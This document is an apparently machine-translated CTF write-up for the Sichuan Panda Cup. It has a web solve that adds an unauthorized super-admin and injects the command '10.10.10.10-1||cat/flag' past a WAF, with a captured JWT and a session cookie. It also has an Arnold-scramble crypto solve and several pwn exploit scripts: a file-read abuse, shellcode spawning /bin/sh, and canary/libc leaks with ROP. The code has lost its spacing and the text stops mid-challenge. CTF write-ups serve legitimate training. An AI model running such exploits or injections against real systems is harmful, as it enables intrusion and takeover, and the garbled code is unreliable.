Title: Sichuan Panda Cup preliminary and final questions WP

Preliminary Competition

web_ezcms

swagger leaked test/test test account login, /sys/user/** has not done authentication, you can add a super administrator user,

roleId is still unknown at this time. And the role module is not unauthorized. Continue reading the user module and discover the interface

There is a roleid leak here, fill in the idfcf34b56-a7a2-4719-9236-867495e74c31 of the admin leaked earlier here

GET/sys/user/roles/fcf34b56-a7a2-4719-9236-867495e74c31 At this time, I know that the super administrator id is 11b3b80c-4a0b-4a92-96ea-fdd4f7a4a7e9, add the user

{

'createWhere':0,

'deptId':'1',

'email':'',

'password':'123456',

'phone':'11111111111',

'roleIds':[

'11b3b80c-4a0b-4a92-96ea-fdd4f7a4a7e9'

],

'sex':'fmale',

'username':'hacker'

} Password field decoding failed, then check the log with the test account and found the key of aes: AbCdEfGhIjKlMnOp, and then the user was added successfully. After we added the user, we found the ping function in the module, but there is waf. Bypass waf and execute the command to get flag

POST/sys/pingHTTP/1.1

Host:

User-Agent:Mozilla/5.0 (Macintosh; IntelMacOSX10.15; rv:126.0)Gecko/20100101Firefox/126.0

Accept:application/json,text/javascript,*/*;q=0.01

Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding:gzip,deflate

Content-Type:application/json;charset=UTF-8

authorization:eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJmY2YzNGI1Ni1hN2EyLTQ3MTktOTIzNi04Njc0OTVlNzRjMzEiLCJqd3Qtcm9sZXMta2V5XyI6WyLotoXnuqfnrqHnkIblkZgiXSwiaXNzIjoieWluZ3h1ZS5jb20iLCJqd3QtcGVybWlzc2lvbnMta2V5IjpbInN5czp1c2VyOmxpc3QiLCJzeXM 6ZGVwdDp1cGRhdGUiLCJzeXM6ZGVwdDpkZXRhaWwiLCJzeXM6dXNlcjpyb2xlOnVwZGF0ZSIsInN5czpwZXJtaXNzaW9uOmFkZCIsInN5czp1c2VyOmFkZCIsInN5czp1c2VyOmFkZCIsInN5czp1c2VyOmRlbGV0ZWQiLCJzeXM6cGVybWlzc2lvbjp1cGRhdGUiLCJzeXM6dXNlcjpkZXRhaWwiLCJzeXM6ZGVwdDpkZWxldGVkIiwic3lzOn JvbGU6dXBkYXRlIiwic3lzOnJvbGU6ZGV0YWlsIiwic3lzOmRlcHQ6bGlzdCIsInN5czpkZXB0OmFkZCIsInN5czp1c2VyOnVwZGF0ZSIsInN5czpyb2xlOmxpc3QiLCJzeXM6cm9sZTpkZWxldGVkIiwic3lzOnBlcm1pc3Npb246bGlzdCIsInN5czpwZXJtaXNzaW9uOmRldGFpbCIsInN5czpwZXJtaXNzaW9uOmRldGFpbCIsInN5czpwZXJtaXNzaW9uO mRlbGV0ZWQiLCJzeXM6bG9nOmRlbGV0ZWQiLCJzeXM6dXNlcjpyb2xlOmRldGFpbCIsInN5czpyb2xlOmFkZCIsInN5czpsb2c6bGlzdCJdLCJqd3QtdXNlci1uYW1lLWtleSI6ImFkbWluIiwiZXhwIjoxNzE2NzE3MjIwLCJpYXQiOjE3MTY3MTAwMjB9.9wcw8M2Ky0lFTbD2B7YaAmPKTl_EO0kJCB5J3bw8FkA

X-Requested-With:XMLHttpRequest

Content-Length:28

Origin:

DNT:1

Sec-GPC:1

Connection:close

Referer:

Cookie:JSESSIONID=C701D746DA63E8FB94270AD6D2FD9ADB

Sec-Fetch-Dest:empty

Sec-Fetch-Mode:cors

Sec-Fetch-Site:same-origin

Priority:u=1

{'ip':'10.10.10.10-1||cat/flag'}

Top Secret File-Code P

importcv2

importnumpyasnp

s=179093209181929149953346613617854206675976823277412565868079070299728290913658

fromCrypto.Util.numberimport*

#p,q=(241627603783727624224706687817893681267,

#347432454257893250496407965506777649463)

##assertp**2+q**2==s

##print(isPrime(p),isPrime(q))

#Img_path='flag_enc.png'

#Img=cv2.imread(Img_path)

#print(Img.shape)

fromympy.solvers.diophantine.diophantineimportcornacchia

'''

This place needs to be modified, decomposed from s, and just factordb

f={7247215681561944590028089613581484765881:1,157606014243244438240601:1,5801674693:1,2:1,13513:1}

'''

x1=cornacchia(1,1,s)

fora,binx1:

asserta**2+b**2==s

ifisPrime(a)andisPrime(b):

print(a,b)

#I got p and q here

fromCrypto.Util.numberimport*

p,q=302951519846417861008714825074296492447,295488723650623654106370451762393175957

s=179093209181929149953346613617854206675976823277412565868079070299728290913658

assertisPrime(p)andisPrime(q)andp**2+q**2==s

importcv2

path1='flag_enc.png'

img=cv2.imread(path1)

#print(img.shape)

r,c,d=img.shape

print(r,c)

#i,j=101,201

fromtqdmimporttqdm

a,b=p,q

foriintqdm(range(r)):

forjinrange(c):

set1=set()

set1.add((i,j))

i1,j1=i,j

whileTrue:

x=(i1+b*j1)%r

y=((a*i1)+(a*b+1)*j1)%c

i1,j1=x,y

if(x,y)notinset1:

set1.add((x,y))

else:

ifi==0andj==0:

Continue continue

assertlen(set1)==190# are all default 190

#We found that it was 190 here. It was a coincidence that we just started to touch it later.

#s1=s%190

#print(s1)

#importnumpyasnp

#defarnold(img,shuffle_times,a,b):

#r,c,d=img.shape

#p=np.zeros(img.shape,np.uint8)

#print(r,c,d,shuffle_times)

#forsinrange(shuffle_times):

#foriinrange(r):

#forjinrange(c):

#x=(i+b*j)%r

#y=((a*i)+(a*b+1)*j)%c

#p[x,y,]=img[i,j,]

#img=np.copy(p)

#returnp

#x1=arnold(img,11,p,q)

#cv2.imwrite('flag3.png',x1)

##cv2.imwrite('flag1.png',img)

#

c=179093209181929149953346613617854206675976823277412565868079070299728290913658

p,q=302951519846417861008714825074296492447,295488723650623654106370451762393175957

importcv2

importnumpyasnp

defarnold(img,shuffle_times,a,b):

r,c,d=img.shape

p=np.zeros(img.shape,np.uint8)

print(r,c,d,shuffle_times)

forsinrange(shuffle_times):

foriinrange(r):

forjinrange(c):

x=(i+b*j)%r

y=((a*i)+(a*b+1)*j)%c

p[x,y,]=img[i,j,]

img=np.copy(p)

return

img=cv2.imread('flag_enc.png')

#print(img)

c1=c%190

foriinrange(190):

img=arnold(img,1,p,q)

cv2.imwrite(f'flag{i+1}.png',img)

'''

1. Just enumerate violently. Anyway, the cycle is 190, just enumerate it all. When you find i=66, flag67.png is flag

2.flag{Ailuropoda_rnelanoleuca}

'''

Persist in doing the right thing

The data retrieved from the traffic packet is a hexadecimal system of an image

Check his hexadecimal system and find that there is an additional data at the end of him

It is a vim drawing command, install DrawIt directly, enter the command to draw the map

GAME

Play the game directly and get flag

This is a real sign-in

FunIoT

gives a set of docker files, run a binary file on it, open the reverse directly, then combine dynamic debugging and static analysis to analyze the protocol format, and finally use one of the functions of reading files, and use //bypass comparison detection:

Then read the flag:

frommpwnimport*

importzlib

#p=remote('127.0.0.1',6768)

p=remote('173.34.20.10',6768)

header=b'FunIoT'#6

cmd=0x102

cmd_encode=int(cmd).to_bytes(2,'big')

len=0x0101

length=int(len).to_bytes(2,'big')

#content=b'getInfo:shadow'

#content=b'getInfo:/lib/udev/rc_keymaps/asus_pc39.toml'

content=b'getInfo://flag'

content=content.ljust(0x101,b'\x00')

check_sum=int(zlib.crc32(content)).to_bytes(4,'big')

full_content=header+length+cmd_encode+check_sum+content

#packet:

#header:6bytes

#length:2bytes

#cmd:2bytes

#checksum:4bytes

#content:unknow

context.log_level='debug'

p.send(full_content)

#p.interactive()

importbase64

print(base64.b64decode(p.recv()).decode('utf-8'))

#command:getInfo,setInfo,secret

guess_hack

The question requires inputting a maximum value and a minimum value, and then guessing the random number in this range. If you guess correctly, you will enter a stack overflow. The number of overflow characters is the number of times you guessed wrong, so you can enter two adjacent numbers, and then guess mistakes enough times, and then perform regular stack overflow utilization. Because the stack can be executed, and the detection requires that the payload is not empty, I directly wrote shellcode and performed a little XOR bypassed non-empty detection:

#random%(max-min+1)+min

frommpwnimport*

context.log_level='debug'

#p=process('./main')

p=remote('173.34.20.233',9999)

p.sendlineafter(b'ch:',b'1')

p.sendlineafter(b'Enteraminimumandmaximumnumberfortheguessinggame:',b'12')

foriinrange(99):

p.sendlineafter(b'Guessanumber',b'1')

p.sendlineafter(b'Guessanumberbetween',b'2')

payload=b'a'*0x3c

payload+=p32(0x0805dea9)

payload+=asm(''' push0xffffffff4

popeax

push0xffffffffffff

popepx

xoreax,ebx

push0xff978cd0

popecx

xorecx,ebx

pushecx

push0x6e69622f

movebx,esp

xorecx,ecx

int0x80''')

payload=payload.ljust(99,b'a')

pause()

p.sendlineafter(b'Congratulations!',payload)

p.interactive()

msg

The stack overflow + format string vulnerability in the dictionary in the dictionary, which exploits the format string vulnerability to leak to canary and libc, and then the overflow return address is one gadget:

frommpwnimport*

#p=process('./main')

p=remote('173.34.20.68',9999)

p.sendlineafter(b'message:',b'%11$p')

canary=int(p.recv(18),16)

success(f'canary:{hex(canary)}')

p.sendlineafter(b'message:',b'%3$p')

libc=int(p.recv(14),16)-0x10e1f2

success(f'libc:{hex(libc)}')

one=libc+0xe3b01

p.sendlineafter(b'message:',b'a'*0x28+p64(canary)+b'b'*8+p64(one))

pause()

p.sendlineafter(b'message:',b'\x00'*0x10)

p.interactive()

stackover

is also a classic stack overflow, but remote libc is a bit different from local. In addition, the return address is returned through leaf esp, [ecx-4], ret, which has not been successfully used. However, after controlling the program to various output places, it is determined that the stack environment is basically the same, so in the end, try not to rely on libc to utilize:

frommpwnimport*

#context.log_level='debug'

#p=process('./stackover')

p=remote(b'173.34.20.46',9999)

p.sendafter(b'read:',b'a'*0x29b)

p.recvuntil(b'a'*0x29b)

canary=u32(b'\x00'+p.recv(3))

success(f'canary:{hex(canary)}')

#pause()

p.sendafter(b'read:',b'a'*(0x29b+7+8+0x2c-0x30-4))

p.recvuntil(b'a'*(0x29b+7+8+0x2c-0x30-4))

p.recv(4)

p.recv(4)

stack=u32(p.recv(4))

success(f'stack:{hex(stack)}')

#pause()

p.sendafter(b'read:',b'b'*(0x29b+0x18+7))

p.recvuntil(b'b'*(0x29b+0x18+7))

libc=u32(p.recv(4))-0x1aed5

success(f'libc:{hex(libc)}')

#pause()

p.sendafter(b'read:',b'a'*(0x29b+7+8+0x2c+0x54))

p.recvuntil(b'a'*(0x29b+7+8+0x2c+0x54))

elf_base=u32(p.recv(4))-0x3fb8

success(f'elf_base:{hex(elf_base)}')

payload=b'c'*(0x29a-0x14-8)

#execve0xc9510

#system0x41780

#puts0x6dc40

#payload+=p32(libc+0x6dc40)

#payload+=p32(elf_base+0x1130)

payload+=b'/bin/sh\x00'

payload+=p32(elf_base+0x128e)

#payload+=p32(elf_base+0x3fcc)

#payload+=p32(0)

payload+=p32(stack-0x50)

payload+=p32(0)

#payload+=p32(libc+0x18e363)

#payload+=p32(libc+0x18e363)

payload+=p32(0)

payload+=p32(0)

payload+=p32(canary)

payload+=p32(0)*3

payload+=p32(stack-0x44)

payload+=p32(elf_base+0x3fb8)

payload+=b'/bin/sh\x00'

pause()

context.log_level='debug'

p.sendafter(b'read:',payload)

p.interactive()

stackover-revenge

provides addition and subtraction functions within 255. At first, no vulnerability was seen, but later I found that a little backdoor code was added to the normal process of the program:

IDA presses F5 and cannot see here. The backdoor code in another place can complete the triggering conditions of the above code: